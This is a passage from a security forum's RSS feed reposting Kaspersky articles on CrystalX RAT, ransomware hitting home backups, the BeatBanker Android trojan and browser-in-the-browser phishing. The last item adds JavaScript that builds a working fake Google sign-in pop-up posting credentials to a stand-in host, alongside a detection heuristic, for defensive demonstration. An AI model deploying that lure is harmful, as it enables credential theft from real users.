			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21704</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-weight: bold;" class="mycode_b">Introduction</span><br />
<br />
In March 2026, we discovered an active campaign promoting previously unknown malware in private Telegram chats. The Trojan was offered as a MaaS (malware‑as‑a‑service) with three subscription tiers. It caught our attention because of its extensive arsenal of capabilities. On the panel provided to third‑party actors, in addition to the standard features of RAT‑like malware, a stealer, keylogger, clipper, and spyware are also available. Most surprisingly, it also includes prankware capabilities: a large set of features designed to trick, annoy, and troll the user. Such a combination of capabilities makes it a rather unique Trojan in its category.<br />
<br />
Kaspersky’s products detect this threat as Backdoor.Win64.CrystalX.*, Trojan.Win64.Agent.*, Trojan.Win32.Agentb.gen.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Technical details</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Background</span><br />
<br />
The new malware was first mentioned in January 2026 in a private Telegram chat for developers of RAT malware. The author actively promoted their creation, called Webcrystal RAT, by attaching screenshots of the web panel. Many users observed that the panel layout was identical to that of the previously known <a href="https://securelist.com/webrat-distributed-via-github/118555/" target="_blank" rel="noopener" class="mycode_url">WebRAT</a> (also called Salat Stealer), leading them to label this malware as a copy. Additional similarities included the fact that the RAT was written in Go, and the messages from the bot selling access keys to the control panel closely matched those of the WebRAT bots.<br />
<br />
<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2026/03/31100755/crystalx-rat1.png" target="_blank" rel="noopener" class="mycode_url"><img src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2026/03/31100755/crystalx-rat1.png" loading="lazy"  alt="[Image: crystalx-rat1.png]" class="mycode_img" /></a><br />
<br />
After some time, this malware was rebranded and received a new name, CrystalX RAT. Its promotion moved to a corresponding new channel, which is quite busy and features marketing tricks, such as access key draws and polls. Moreover, it expanded beyond Telegram: a special YouTube channel was created, aimed at marketing promotion and already containing a video review of the capabilities of this malware.<br />
<br />
<a href="https://securelist.com/crystalx-rat-with-prankware-features/119283/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-weight: bold;" class="mycode_b">Introduction</span><br />
<br />
In March 2026, we discovered an active campaign promoting previously unknown malware in private Telegram chats. The Trojan was offered as a MaaS (malware‑as‑a‑service) with three subscription tiers. It caught our attention because of its extensive arsenal of capabilities. On the panel provided to third‑party actors, in addition to the standard features of RAT‑like malware, a stealer, keylogger, clipper, and spyware are also available. Most surprisingly, it also includes prankware capabilities: a large set of features designed to trick, annoy, and troll the user. Such a combination of capabilities makes it a rather unique Trojan in its category.<br />
<br />
Kaspersky’s products detect this threat as Backdoor.Win64.CrystalX.*, Trojan.Win64.Agent.*, Trojan.Win32.Agentb.gen.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Technical details</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Background</span><br />
<br />
The new malware was first mentioned in January 2026 in a private Telegram chat for developers of RAT malware. The author actively promoted their creation, called Webcrystal RAT, by attaching screenshots of the web panel. Many users observed that the panel layout was identical to that of the previously known <a href="https://securelist.com/webrat-distributed-via-github/118555/" target="_blank" rel="noopener" class="mycode_url">WebRAT</a> (also called Salat Stealer), leading them to label this malware as a copy. Additional similarities included the fact that the RAT was written in Go, and the messages from the bot selling access keys to the control panel closely matched those of the WebRAT bots.<br />
<br />
<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2026/03/31100755/crystalx-rat1.png" target="_blank" rel="noopener" class="mycode_url"><img src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2026/03/31100755/crystalx-rat1.png" loading="lazy"  alt="[Image: crystalx-rat1.png]" class="mycode_img" /></a><br />
<br />
After some time, this malware was rebranded and received a new name, CrystalX RAT. Its promotion moved to a corresponding new channel, which is quite busy and features marketing tricks, such as access key draws and polls. Moreover, it expanded beyond Telegram: a special YouTube channel was created, aimed at marketing promotion and already containing a video review of the capabilities of this malware.<br />
<br />
<a href="https://securelist.com/crystalx-rat-with-prankware-features/119283/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Ransomware now taking aim at personal backups]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21703</link>
			<pubDate>Wed, 01 Apr 2026 07:18:02 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21703</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">Personal backups and home NAS are now in cybercriminals’ crosshairs. We break down exactly how hackers encrypt your data — and how you can stop them.</span><br />
 <br />
Today — March 31 — is World Backup Day. And every year, most people tell themselves, “I’ll get around to that tomorrow”. But even if you’re one of the responsible ones who regularly backs up their docs, photo archives, and the entire operating system — you’re still at risk. Why? Because ransomware has learned how to specifically target everyday users’ backups.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Why home users are in the crosshairs</span><br />
<br />
In the not-so-distant past, ransomware was mostly a big business problem. Attackers focused on corporate servers and enterprise backups because freezing a major company’s production process or stealing all their information and customer databases usually meant a massive payout. We’ve seen plenty of those cases over the last few years. However, the “small-fry” market has become just as tempting for cybercriminals — and here’s why.<br />
<br />
For starters, attacks are automated. Modern ransomware doesn’t need a human operating it manually. These programs scan the internet for vulnerable devices and, upon finding one, encrypt everything indiscriminately without the hacker getting involved. This means a single attacker can <a href="https://www.bleepingcomputer.com/news/security/qlocker-ransomware-shuts-down-after-extorting-hundreds-of-qnap-users/" target="_blank" rel="noopener" class="mycode_url">effortlessly hit</a> thousands of home devices.<br />
<br />
Second, because of this broad reach, the ransom demands have become more “affordable”. Regular users aren’t asked for millions, but “only” a few hundred or thousand dollars. Many people are willing to pay that amount without involving the police — especially when family archives, photos, medical records, banking documents, and other personal files are on the line, with no other copies in existence. And when you multiply those smaller payouts by thousands of victims, the hackers walk away with very tidy sums.<br />
<br />
And finally, home devices are usually sitting ducks. While corporate networks are guarded really well, the average home router most likely runs on factory settings with “admin” as the password. Many people leave their network attached storage (NAS) wide open to the internet with <a href="https://technijian.com/cyber-security/cyberattacks/millions-of-synology-nas-at-risk-patch-for-cve-2024-10443/" target="_blank" rel="noopener" class="mycode_url">zero protection</a>. It’s low-hanging fruit.<br />
<br />
<a href="https://www.kaspersky.com/blog/preventing-ransomware-attacks-on-backups-of-home-users/55532/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">Personal backups and home NAS are now in cybercriminals’ crosshairs. We break down exactly how hackers encrypt your data — and how you can stop them.</span><br />
 <br />
Today — March 31 — is World Backup Day. And every year, most people tell themselves, “I’ll get around to that tomorrow”. But even if you’re one of the responsible ones who regularly backs up their docs, photo archives, and the entire operating system — you’re still at risk. Why? Because ransomware has learned how to specifically target everyday users’ backups.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Why home users are in the crosshairs</span><br />
<br />
In the not-so-distant past, ransomware was mostly a big business problem. Attackers focused on corporate servers and enterprise backups because freezing a major company’s production process or stealing all their information and customer databases usually meant a massive payout. We’ve seen plenty of those cases over the last few years. However, the “small-fry” market has become just as tempting for cybercriminals — and here’s why.<br />
<br />
For starters, attacks are automated. Modern ransomware doesn’t need a human operating it manually. These programs scan the internet for vulnerable devices and, upon finding one, encrypt everything indiscriminately without the hacker getting involved. This means a single attacker can <a href="https://www.bleepingcomputer.com/news/security/qlocker-ransomware-shuts-down-after-extorting-hundreds-of-qnap-users/" target="_blank" rel="noopener" class="mycode_url">effortlessly hit</a> thousands of home devices.<br />
<br />
Second, because of this broad reach, the ransom demands have become more “affordable”. Regular users aren’t asked for millions, but “only” a few hundred or thousand dollars. Many people are willing to pay that amount without involving the police — especially when family archives, photos, medical records, banking documents, and other personal files are on the line, with no other copies in existence. And when you multiply those smaller payouts by thousands of victims, the hackers walk away with very tidy sums.<br />
<br />
And finally, home devices are usually sitting ducks. While corporate networks are guarded really well, the average home router most likely runs on factory settings with “admin” as the password. Many people leave their network attached storage (NAS) wide open to the internet with <a href="https://technijian.com/cyber-security/cyberattacks/millions-of-synology-nas-at-risk-patch-for-cve-2024-10443/" target="_blank" rel="noopener" class="mycode_url">zero protection</a>. It’s low-hanging fruit.<br />
<br />
<a href="https://www.kaspersky.com/blog/preventing-ransomware-attacks-on-backups-of-home-users/55532/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Android trojan posing as government services and Starlink apps]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21654</link>
			<pubDate>Thu, 12 Mar 2026 10:18:52 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21654</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">We break down the BeatBanker trojan attack, which combines espionage, crypto theft, and mining with inventive ways to dig its heels into a smartphone. </span><br />
 <br />
To achieve their malign aims, Android malware developers have to address several challenges in a row: trick users to get inside their smartphones, dodge security software, talk victims into granting various system permissions, keep away from built-in battery optimizers that kill resource hogs, and, after all that, make sure their malware actually turns a profit. The creators of the BeatBanker — an Android‑based malware campaign recently discovered by our experts — have come up with something new for each one of these steps. The attack is (for now) aimed at Brazilian users, but the developers’ ambitions will almost certainly push them toward international expansion, so it’s worth staying on guard and studying the threat actor’s tricks. You can find a full technical analysis of the malware on <a href="https://securelist.com/beatbanker-miner-and-banker/119121/" target="_blank" rel="noopener" class="mycode_url">Securelist</a>.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">How BeatBanker infiltrates a smartphone</span><br />
<br />
The malware is distributed through specially crafted phishing pages that mimic the Google Play Store. A page that’s easily mistaken for the official app marketplace invites users to download a seemingly useful app. In one campaign, the trojan disguised itself as the Brazilian government services app, INSS Reembolso; in another, it posed as the Starlink app.<br />
<br />
<a href="https://media.kasperskydaily.com/wp-content/uploads/sites/92/2026/03/11071936/beatbanker-btmob-android-malware-disguised-starlink-inss-reembolso-01.png" target="_blank" rel="noopener" class="mycode_url"><img src="https://media.kasperskydaily.com/wp-content/uploads/sites/92/2026/03/11071936/beatbanker-btmob-android-malware-disguised-starlink-inss-reembolso-01.png" loading="lazy"  alt="[Image: beatbanker-btmob-android-malware-disguis...lso-01.png]" class="mycode_img" /></a><br />
<br />
The malicious site cupomgratisfood{.}shop does an excellent job imitating an app store. It’s just unclear why the fake INSS Reembolso appears all of three times. To be extra sure, perhaps?!<br />
<br />
The installation takes place in several stages to avoid requesting too many permissions at once and to further lull the victim’s vigilance. After the first app is downloaded and launched, it displays an interface that also resembles Google Play and simulates an update for the decoy app — requesting the user’s permission to install apps, which doesn’t look out-of-the-ordinary in context. If you grant this permission, the malware downloads additional malicious modules to your smartphone.<br />
<br />
<a href="https://media.kasperskydaily.com/wp-content/uploads/sites/92/2026/03/11072036/beatbanker-btmob-android-malware-disguised-starlink-inss-reembolso-02.png" target="_blank" rel="noopener" class="mycode_url"><img src="https://media.kasperskydaily.com/wp-content/uploads/sites/92/2026/03/11072036/beatbanker-btmob-android-malware-disguised-starlink-inss-reembolso-02.png" loading="lazy"  alt="[Image: beatbanker-btmob-android-malware-disguis...lso-02.png]" class="mycode_img" /></a><br />
<br />
After installation, the trojan simulates a decoy app update via Google Play by requesting permission to install applications while downloading additional malicious modules in the process.<br />
<br />
All components of the trojan are encrypted. Before decrypting and proceeding to the next stages of infection, it checks to ensure it’s on a real smartphone and in the target country. BeatBanker immediately terminates its own process if it finds any discrepancies or detects that it’s running in emulated or analysis environments. This complicates dynamic analysis of the malware. Incidentally, the fake update downloader injects modules directly into RAM to avoid creating files on the smartphone that would be visible to security software.<br />
<br />
<a href="https://www.kaspersky.com/blog/beatbanker-btmob-android-malware-disguised-starlink-inss-reembolso/55401/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">We break down the BeatBanker trojan attack, which combines espionage, crypto theft, and mining with inventive ways to dig its heels into a smartphone. </span><br />
 <br />
To achieve their malign aims, Android malware developers have to address several challenges in a row: trick users to get inside their smartphones, dodge security software, talk victims into granting various system permissions, keep away from built-in battery optimizers that kill resource hogs, and, after all that, make sure their malware actually turns a profit. The creators of the BeatBanker — an Android‑based malware campaign recently discovered by our experts — have come up with something new for each one of these steps. The attack is (for now) aimed at Brazilian users, but the developers’ ambitions will almost certainly push them toward international expansion, so it’s worth staying on guard and studying the threat actor’s tricks. You can find a full technical analysis of the malware on <a href="https://securelist.com/beatbanker-miner-and-banker/119121/" target="_blank" rel="noopener" class="mycode_url">Securelist</a>.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">How BeatBanker infiltrates a smartphone</span><br />
<br />
The malware is distributed through specially crafted phishing pages that mimic the Google Play Store. A page that’s easily mistaken for the official app marketplace invites users to download a seemingly useful app. In one campaign, the trojan disguised itself as the Brazilian government services app, INSS Reembolso; in another, it posed as the Starlink app.<br />
<br />
<a href="https://media.kasperskydaily.com/wp-content/uploads/sites/92/2026/03/11071936/beatbanker-btmob-android-malware-disguised-starlink-inss-reembolso-01.png" target="_blank" rel="noopener" class="mycode_url"><img src="https://media.kasperskydaily.com/wp-content/uploads/sites/92/2026/03/11071936/beatbanker-btmob-android-malware-disguised-starlink-inss-reembolso-01.png" loading="lazy"  alt="[Image: beatbanker-btmob-android-malware-disguis...lso-01.png]" class="mycode_img" /></a><br />
<br />
The malicious site cupomgratisfood{.}shop does an excellent job imitating an app store. It’s just unclear why the fake INSS Reembolso appears all of three times. To be extra sure, perhaps?!<br />
<br />
The installation takes place in several stages to avoid requesting too many permissions at once and to further lull the victim’s vigilance. After the first app is downloaded and launched, it displays an interface that also resembles Google Play and simulates an update for the decoy app — requesting the user’s permission to install apps, which doesn’t look out-of-the-ordinary in context. If you grant this permission, the malware downloads additional malicious modules to your smartphone.<br />
<br />
<a href="https://media.kasperskydaily.com/wp-content/uploads/sites/92/2026/03/11072036/beatbanker-btmob-android-malware-disguised-starlink-inss-reembolso-02.png" target="_blank" rel="noopener" class="mycode_url"><img src="https://media.kasperskydaily.com/wp-content/uploads/sites/92/2026/03/11072036/beatbanker-btmob-android-malware-disguised-starlink-inss-reembolso-02.png" loading="lazy"  alt="[Image: beatbanker-btmob-android-malware-disguis...lso-02.png]" class="mycode_img" /></a><br />
<br />
After installation, the trojan simulates a decoy app update via Google Play by requesting permission to install applications while downloading additional malicious modules in the process.<br />
<br />
All components of the trojan are encrypted. Before decrypting and proceeding to the next stages of infection, it checks to ensure it’s on a real smartphone and in the target country. BeatBanker immediately terminates its own process if it finds any discrepancies or detects that it’s running in emulated or analysis environments. This complicates dynamic analysis of the malware. Incidentally, the fake update downloader injects modules directly into RAM to avoid creating files on the smartphone that would be visible to security software.<br />
<br />
<a href="https://www.kaspersky.com/blog/beatbanker-btmob-android-malware-disguised-starlink-inss-reembolso/55401/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Browser-in-the-browser attacks: from theory to reality]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21630</link>
			<pubDate>Wed, 04 Mar 2026 16:49:33 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21630</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">A browser-in-the-browser attack, theoretically described in 2022, has been adopted in real-world phishing. We break down how it works, and how to spot a fake authentication window.</span><br />
 <br />
In 2022, we dived deep into an attack method called <a href="https://www.kaspersky.com/blog/browser-in-the-browser-attack/44163/" target="_blank" rel="noopener" class="mycode_url">browser-in-the-browser</a> — originally developed by the cybersecurity researcher known as <span style="font-style: italic;" class="mycode_i">mr.d0x</span>. Back then, no actual examples existed of this model being used in the wild. Fast-forward four years, and browser-in-the-browser attacks have graduated from the theoretical to the real: attackers are now using them in the field. In this post, we revisit what exactly a browser-in-the-browser attack is, show how hackers are deploying it, and, most importantly, explain how to keep yourself from becoming its next victim.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">What is a browser-in-the-browser (BitB) attack?</span><br />
<br />
For starters, let’s refresh our memories on what <a href="https://mrd0x.com/browser-in-the-browser-phishing-attack/" target="_blank" rel="noopener" class="mycode_url"><span style="font-style: italic;" class="mycode_i">mr.d0x</span> actually cooked up</a>. The core of the attack stems from his observation of just how advanced modern web development tools — HTML, CSS, JavaScript, and the like — have become. It’s this realization that inspired the researcher to come up with a particularly elaborate phishing model.<br />
<br />
A browser-in-the-browser attack is a sophisticated form of phishing that uses web design to craft fraudulent websites imitating login windows for well-known services like Microsoft, Google, Facebook, or Apple that look just like the real thing. The researcher’s concept involves an attacker building a legitimate-looking site to lure in victims. Once there, users can’t leave comments or make purchases unless they “sign in” first.<br />
<br />
Signing in seems easy enough: just click the <span style="font-style: italic;" class="mycode_i">Sign in with </span><span style="font-style: italic;" class="mycode_i">{popular service name}</span> button. And this is where things get interesting: instead of a genuine authentication page provided by the legitimate service, the user gets a fake form rendered inside the malicious site, looking exactly like… a browser pop-up. Furthermore, the address bar in the pop-up, also rendered by the attackers, displays a <span style="font-style: italic;" class="mycode_i">perfectly legitimate</span> URL. Even a close inspection won’t reveal the trick.<br />
<br />
From there, the unsuspecting user enters their Microsoft, Google, Facebook, or Apple credentials into this rendered window, and those details go straight to the cybercriminals rather than to the provider. For a while the scheme remained a proof of concept by the security researcher. Now real-world attackers have added it to their arsenals.<br />
<br />
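To make the mechanics concrete, here is an added example; it is not code from the Kaspersky post, nor mr.d0x’s original proof of concept. The first function builds a lure of the kind described above: a positioned div whose “title bar” and “address bar” are just HTML, so the displayed URL can say anything while the real tab stays on the attacker’s domain. The second is a heuristic check a content scanner or browser extension could run over a page’s markup, looking for the mismatch the trick depends on: a trusted identity provider’s URL drawn as visible text on a page that is not that provider, next to a password form that posts somewhere else. The provider list, the host names and the exfiltration URL are placeholders chosen for this demo.<br />
<br />
```javascript
"use strict";

// Identity providers whose sign-in pop-ups are commonly imitated.
// This list is an assumption for the demo, not taken from the post.
const TRUSTED_AUTH_HOSTS = new Set([
  "accounts.google.com",
  "login.microsoftonline.com",
  "www.facebook.com",
  "appleid.apple.com",
]);

// Attacker side: the "pop-up" is a positioned div drawn by the lure page.
// Title bar, padlock and address bar are plain HTML, so the address text can
// claim any URL while the tab's real address bar still shows the lure's domain.
// (Reconstruction of the technique for illustration; not mr.d0x's code.)
function buildBitbPopup({ service, displayedUrl, exfilUrl }) {
  return [
    '<div class="bitb-window" style="position:fixed;top:20%;left:30%;width:480px;',
    'border:1px solid #999;border-radius:8px;background:#fff;box-shadow:0 4px 24px rgba(0,0,0,.3)">',
    '  <div class="bitb-titlebar" style="background:#f1f1f1;padding:6px 10px;font:13px sans-serif">',
    '    <span class="bitb-padlock">&#128274;</span>',
    `    <span class="bitb-address">${displayedUrl}</span>`,
    "  </div>",
    `  <form class="bitb-form" method="POST" action="${exfilUrl}">`,
    `    <h2>Sign in with ${service}</h2>`,
    '    <input type="email" name="user" placeholder="Email">',
    '    <input type="password" name="pass" placeholder="Password">',
    '    <button type="submit">Next</button>',
    "  </form>",
    "</div>",
  ].join("\n");
}

// Resolve a (possibly relative) URL to a lowercase hostname; null if unparsable.
function hostOf(url, base) {
  try {
    return (base === undefined ? new URL(url) : new URL(url, base)).hostname.toLowerCase();
  } catch {
    return null;
  }
}

// Defender side. A real federated sign-in never renders the provider's URL as
// page text; the lure has to, because its address bar is fake. Flag any page
// that shows a trusted provider's URL in visible text, is not itself hosted by
// that provider, and contains a password form posting anywhere but the provider.
function detectBitb(html, pageUrl) {
  const pageHost = hostOf(pageUrl);
  const visibleText = html.replace(/<[^>]*>/g, " "); // crude tag strip, good enough for static markup
  const shownHosts = new Set();
  for (const m of visibleText.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    shownHosts.add(m[1].toLowerCase());
  }
  const spoofedHosts = [...shownHosts].filter(
    (h) => TRUSTED_AUTH_HOSTS.has(h) && h !== pageHost
  );
  const findings = [];
  for (const f of html.matchAll(/<form\b([^>]*)>([\s\S]*?)<\/form>/gi)) {
    const [, attrs, body] = f;
    if (!/type\s*=\s*["']?password/i.test(body)) continue;
    const actionMatch = attrs.match(/\baction\s*=\s*["']([^"']*)["']/i);
    // A form without an action posts back to the page itself.
    const actionHost = hostOf(actionMatch ? actionMatch[1] : "", pageUrl);
    for (const spoofedHost of spoofedHosts) {
      if (actionHost !== spoofedHost) {
        findings.push({ spoofedHost, pageHost, actionHost });
      }
    }
  }
  return findings;
}

// Constructed demo input: a lure on a fake shop offering "Sign in with Google".
const DEMO_PAGE_URL = "https://shop.example.org/checkout";
const DEMO_LURE = buildBitbPopup({
  service: "Google",
  displayedUrl: "https://accounts.google.com/signin/v2/identifier",
  exfilUrl: "https://collect.example.net/creds",
});

// An ordinary first-party login form, for contrast: nothing to flag.
const DEMO_BENIGN = '<form action="/login"><input type="password" name="p"></form>';

function demo() {
  return {
    lure: detectBitb(DEMO_LURE, DEMO_PAGE_URL),
    benign: detectBitb(DEMO_BENIGN, DEMO_PAGE_URL),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```
<br />
Run it with node: the demo reports one finding for the constructed lure (accounts.google.com shown as text, credentials posted to collect.example.net) and none for the first-party form. The regex-based tag stripping is deliberately crude; it misses URLs assembled by script at runtime and can flag help text that merely mentions a provider’s URL, so treat a hit as a signal for review, not a verdict. On the user side, the quickest manual check is still the simplest: a genuine pop-up is a separate window that can be dragged outside the browser tab, whereas the fake one cannot leave the page that draws it.<br />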
<a href="https://www.kaspersky.com/blog/browser-in-the-browser-phishing-facebook/55374/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">A browser-in-the-browser attack, theoretically described in 2022, has been adopted in real-world phishing. We break down how it works, and how to spot a fake authentication window.</span><br />
<br />
<a href="https://www.kaspersky.com/blog/browser-in-the-browser-phishing-facebook/55374/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
	</channel>
</rss>